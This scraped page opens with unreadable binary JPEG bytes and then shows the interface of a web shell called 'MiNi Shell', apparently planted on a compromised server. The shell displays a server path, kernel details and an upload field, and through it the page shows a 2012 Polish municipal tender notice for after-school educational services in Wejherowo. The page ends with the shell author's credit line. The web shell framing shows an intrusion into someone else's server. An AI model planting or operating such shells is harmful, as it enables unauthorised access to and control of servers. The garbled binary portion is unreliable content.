JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/18602-N-2012.html

<p class="kh_header"><b>Wejherowo: Zakup usług szkoleniowych w ramach realizowanego projektu indywidualizacji i wychowania uczniów pt. ABC nauki - wyrównanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Wejherowo</b><br>
<b>Numer ogłoszenia: 18602 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Wejherowo , Os. Przyjaźni 6, 84-200 Wejherowo, woj. pomorskie, tel. 058 6779701, faks 058 6779700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.wejherowo.ug.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług szkoleniowych w ramach realizowanego projektu indywidualizacji i wychowania uczniów pt. ABC nauki - wyrównanie szans edukacyjno-rozwojowych dzieci klas I-III szkół podstawowych Gminy Wejherowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług edukacyjnych polegających na przeprowadzeniu zajęć pozalekcyjnych w roku szkolnym 2011/2012 (luty 2011 - czerwiec 2012), oraz w roku szkolnym 2012/2013 w 6 szkołach podstawowych na terenie Gminy Wejherowo w następujących miejscowościach: 
Bolszewo, Gościcino, Gowino, Góra, Nowy Dwór Wejherowski, Orle.
2.	Zamówienie realizowane jest w ramach projektu systemowego pn. ABC nauki - wyrównywanie szans edukacyjno -rozwojowych dzieci klas I-III szkół podstawowych Gminy Wejherowo, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, 
Priorytetu IX Programu operacyjnego Kapitał Ludzki: Rozwój wykształcenia 
i kompetencji w regionach, 
Działanie 9.1, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.
4. W ramach przedmiotu zamówienia należy rozumieć świadczenie usług edukacyjnych polegających na przeprowadzeniu w 6 szkołach podstawowych na terenie Gminy Wejherowo następujących zajęć pozalekcyjnych:
	1. Zajęcia dla dzieci ze specyficznymi trudnościami w czytaniu i pisaniu, w tym także zagrożone ryzykiem dysleksji
2. Zajęcia dla dzieci z trudnościami w zdobywaniu umiejętności matematycznych
3. Gimnastyka korekcyjna dla dzieci z wadami postawy
4. Zajęcia socjoterapeutyczne i psychoedukacyjne
5. Zajęcia logopedyczne dla dzieci z zaburzeniami mowy
6. Zajęcia rozwijające zainteresowania i uzdolnienia uczniów w zakresie 
        matematyczno-przyrodniczym, informatycznym oraz z języka angielskiego
7. Inne zajęcia rozwijające i zainteresowania uczniów.

Szczegółowy zakres zajęć w poszczególnych szkołach został określony w formularzu ofertowym stanowiącym załącznik nr 1 do SIWZ

5. Obowiązki Wykonawcy w ramach przedmiotu zamówienia obejmują w szczególności:
1)	przygotowanie harmonogramu realizacji zajęć zgodnie z niniejszą specyfikacją,  dostosowanie do ustalonego w danej szkole planu lekcji oraz uzgodnienie harmonogramu z Zamawiającym w terminie do dnia podpisania umowy. 
W przypadku zmiany planu, harmonogram będzie musiał uwzględniać aktualny rozkład zajęć. Dyrektor danej szkoły, w której odbywać się będą zajęcia, oraz Zamawiający musi być bezzwłocznie  poinformowany o wszelkich zmianach w harmonogramie, które to musza być z nim uzgadniane,
2)	opracowanie tematyki zajęć oraz celów zajęć zgodnie z celem ogólnym oraz celami szczegółowymi założonymi we wniosku aplikacyjnym w terminie do dnia podpisania umowy, przy szczególnym uwzględnieniu potrzeb i umiejętności uczniów; scenariusze zajęć powinny uwzględniać szacunek i otwartość na inność wśród dzieci oraz zapewniać przestrzeganie zasady równości płci,
3)	rzetelną realizację godzin zajęć w ramach projektu zgodnie z ustalonym harmonogramem realizacji zajęć, zatwierdzonym przez Zamawiającego,
4)	zapewnienie opieki nad uczniami podczas zajęć,
5)	dbanie o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu,
6)	współdziałanie z Dyrektorami szkół, w których odbywają się zajęcia, w zakresie wszelkich spraw związanych z ich prowadzeniem,
7)	przestrzeganie obowiązujących przepisów prawa oświatowego i statutów szkół,
8)	terminowe sporządzanie n/w dokumentacji:
A)	Dziennik zajęć - uzupełniany na bieżąco
B)	Karty oceny opisowej ucznia -odrębnie dla każdego ucznia, po każdym półroczu,
C)	Listy obecności - Wykonawca jest odpowiedzialny za zgodność listy obecności podpisanej przez uczestników projektu z ilością dzieci obecnych na zajęciach wykazaną w dzienniku zajęć,
D)	Sporządzania sprawozdań i innych dokumentów zleconych przez Koordynatora projektu, w tym diagnozy przyrostu wiedzy uczniów i dokonywania ewaluacji prowadzonych zajęć w odniesieniu do założonych kryteriów w projekcie i przedstawiania tych informacji raz na półrocze,
E)	Przeprowadzenie testu diagnozującego oraz testu sprawdzającego nabyte umiejętności, w przypadku zajęć plastycznych - może być inna forma ewaluacji np. konkurs, w przypadku logopedii, gimnastyki korekcyjnej- przedstawienie 
w formie pisemnej
F)	Sprawozdania nauczycieli prowadzących zajęcia.
9)	Sporządzanie miesięcznych kart czasu pracy,
10)	Wykonywanie innych zadań wynikających z przepisów prawa. 
11) Zajęcia mogą odbywać się równolegle w tych samych godzinach. 
12) Godzina zajęć obejmuje 45 minut, z wyłączeniem zajęć logopedycznych oraz zajęć z socjoterapii, które prowadzone są przez 60 minut.
12) Zajęcia prowadzone będą na terenie danej szkoły.
13)	Świadczone usługi będą obejmować przeprowadzenie zajęć dydaktycznych - wyrównawczych oraz dla uczniów szczególnie uzdolnionych z zajęć wyszczególnianych w poszczególnych zadaniach na podstawie zatwierdzonego programu autorskiego opartego na przeprowadzonej diagnozie umiejętności uczniów. 
14)	Zaleca się, aby Wykonawca, na własną odpowiedzialność i ryzyko zgromadził wszelkie informacje, które mogą być konieczne do prawidłowego przygotowania oferty i podpisania umowy. Każdy z wykonawców ponosi pełną odpowiedzialność za skutki braku lub mylnego rozpoznania warunków realizacji zamówienia. 

Zamawiający dopuszcza składanie ofert częściowych.

Zamówienie zostało podzielone przez zamawiającego na poszczególne zadania określone w formularzu ofertowym stanowiącym załączniku nr 1 do SIWZ. 

Zamawiający przewiduje możliwość przedłużenia terminu realizacji do 31.12.2013, pod warunkiem wyrażenia zgody przez Instytucję Pośredniczącą.

Ilości poszczególnych godzin lekcyjnych do przeprowadzenia w danym roku szkolnym 2011/2012, 2012/2013 oraz 2013/2014* zostaną określone w momencie podpisania umowy.

* W przypadku wyrażenia zgody przez Instytucję Pośredniczącą..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.10.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 96.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawców przystępujących do przetargu wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w zakresie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w zakresie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w zakresie powyższego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować dysponowanie osobami zdolnymi do wykonania zamówienia, tj. odpowiednio:

Zadania 1-11, 17- 22 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	Posiada wykształcenie:
 - wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz ukończone studia podyplomowe z zakresu terapii pedagogicznej, lub 
- wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz kurs kwalifikacyjny z zakresu terapii pedagogicznej, 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć z terapii pedagogicznej lub posiada minimum roczne doświadczenie przy prowadzeniu zajęć w klasach I-III szkoły podstawowej,

Zadania 12-16, 23-35, - wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej,
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć w klasach I-III szkoły podstawowej,

Zadania 36-46 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym w zakresie wychowania fizycznego oraz dające uprawnienia do prowadzenia zajęć gimnastyki korekcyjnej, lub
- ukończone studia min. licencjackie, studia podyplomowe lub kursy kwalifikacyjne w zakresie gimnastyki korekcyjnej lub rehabilitacji, lub
- wykształcenie wyższe min. licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz ukończone studia podyplomowe lub kursy kwalifikacyjne w zakresie gimnastyki korekcyjnej,
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć z gimnastyki korekcyjnej w szkole podstawowej

Zadania 47-49 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	 posiada wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do prowadzenia zajęć z socjoterapii, w tym posiadającą studia podyplomowe z zakresu socjoterapii 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć z socjoterapii w szkole podstawowej

Zadania 50-67 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym oraz ukończone studia podyplomowe w zakresie logopedii, lub
- wykształcenie wyższe zawodowe w zakresie logopedii z przygotowaniem pedagogicznym, lub 
- ukończone studia min. licencjackie oraz ukończone studia podyplomowe 
w zakresie logopedii,
c)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć logopedycznych w szkole podstawowej

Zadania 70,71,79,82, - wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej,
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć matematycznych lub matematyczno - przyrodniczych w szkole podstawowej



Zadania 94, 95 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej,
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć teatralnych w szkole podstawowej

Zadania 68,72 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	 posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej, lub
- wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania przyrody, 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć przyrodniczych w szkole podstawowej

Zadania 69,76,77,81,84 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej wraz z kwalifikacjami do nauczania języka angielskiego 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć z języka angielskiego w szkole podstawowej

Zadania 85-89,96 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	 posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub 
- wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania plastyki, 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć plastycznych w szkole podstawowej

Zadania 73,74,75,83 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	 posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania informatyki lub 
- wyższe minimum licencjackie z przygotowaniem pedagogicznym i posiadający ukończone studia podyplomowe z zakresu informatyki
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć informatycznych w szkole podstawowej

Zadania 90 - wymagane jest dysponowanie minimum 1 osobą, która:
a)	 posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub
- wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym 
z kwalifikacjami do nauczania muzyki, 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć muzycznych w szkole podstawowej.

Zadania 91,92,93- wymagane jest dysponowanie minimum 1 osobą, która:
a)	posiada wykształcenie:
- wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej lub
- wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do prowadzenia zajęć gimnastyczno-ruchowych, 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć gimnastyczno-ruchowych w szkole podstawowej

Zadanie 78 - wymagane jest dysponowanie minimum 1 osobą, która posiada:
a)	 wykształcenie wyższe minimum licencjackie z przygotowaniem pedagogicznym dającym kwalifikacje do nauczania w klasach I-III szkoły podstawowej oraz posiada kwalifikacje do nauczania przyrody, 
b)	oraz posiada minimum roczne doświadczenie przy prowadzeniu zajęć naukowo-technicznych w szkole podstawowej.

Przez minimum roczne doświadczenie Zamawiający rozumie okres obejmujący rok szkolny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymagań w zakresie powyższego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>X Oświadczenie Wykonawcy o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust. 1 i w art. 24 ustawy PZP
X Aktualny odpis z właściwego rejestru (lub zaświadczenie o wpisie do ewidencji działalności gospodarczej), jeżeli odrębne przepisy wymagają wpisu do rejestru wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert lub 
X oświadczenie o prowadzeniu działalności gospodarczej na podstawie wpisu do Centralnego Rejestru Działalności Gospodarczej z podaniem jego numeru,
W przypadku podmiotów zagranicznych oferent powinien przedstawić wyciąg z rejestru sądowego, a w przypadku jego braku równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju pochodzenia lub kraju, z którego przybywa. W przypadku, gdy dany kraj nie wydaje takich dokumentów lub zaświadczeń, mogą być one zastąpione oświadczeniem złożonym pod przysięgą lub - w Państwach Członkowskich, w których prawo nie przewiduje składania takich oświadczeń - uroczystym oświadczeniem złożonym przez daną osobę przed właściwym organem sądowym lub administracyjnym, notariuszem albo przed właściwą organizacją zawodową lub gospodarczą kraju pochodzenia lub kraju, z którego ta osoba przybywa.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej:
1.	Zamawiający przewiduje możliwość dokonania zmian umowy w następujących przypadkach: 
Zamawiający dopuszcza możliwość zmiany umowy, w szczególności w zakresie: 
1)	zmiany terminu końcowego spowodowanej zmianą harmonogramu realizacji zajęć, ze względu na zmianę siatki godzin zajęć podstawowych, bądź nieobecności osoby wykonującej powierzoną funkcję, pod warunkiem podpisania przez strony porozumienia w sprawie zmiany terminu,
2)	zmianą harmonogramu realizacji zajęć, 
3)	zmiany osoby wykonującej powierzoną funkcję, które mogą nastąpić jedynie w szczególnie uzasadnionych sytuacjach (np. choroba), pod warunkiem, że osoba (osoby) wskazana do prowadzenia zajęć, będzie posiadała przygotowanie co najmniej równe osobie dotychczas pełniącej tę funkcję oraz będzie spełniała wymogi określone w specyfikacji istotnych warunków zamówienia;
4)	zamiany lub wprowadzenia nowych podwykonawców pod warunkiem uzyskania zgody Zamawiającego, na zasadach określonych w Istotnych Warunkach Umowy. 
5)	zmiany danych Wykonawcy np. zmiana siedziby, adresu, nazwy (bez zmiany samego Wykonawcy).
2.	Wprowadzenie zmiany postanowień umowy wymaga aneksu sporządzonego w formie pisemnej pod rygorem nieważności.
Istotne postanowienia umowy zawarte zostały w dok. Projekt Umowy (Załącznik Nr 7 do SIWZ)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.ug.wejherowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wejherowo, Osiedle Przyjaźni 6, 84-200 Wejherowo..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 08:45, miejsce: Urząd Gminy Wejherowo, Osiedle Przyjaźni 6, 84-200 Wejherowo - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie realizowane jest w ramach projektu systemowego pn. ABC nauki - wyrównywanie szans edukacyjno -rozwojowych dzieci klas I-III szkół podstawowych Gminy Wejherowo, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, 
Priorytetu IX Programu operacyjnego Kapitał Ludzki: Rozwój wykształcenia 
i kompetencji w regionach, 
Działanie 9.1, Poddziałanie 9.1.2: Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com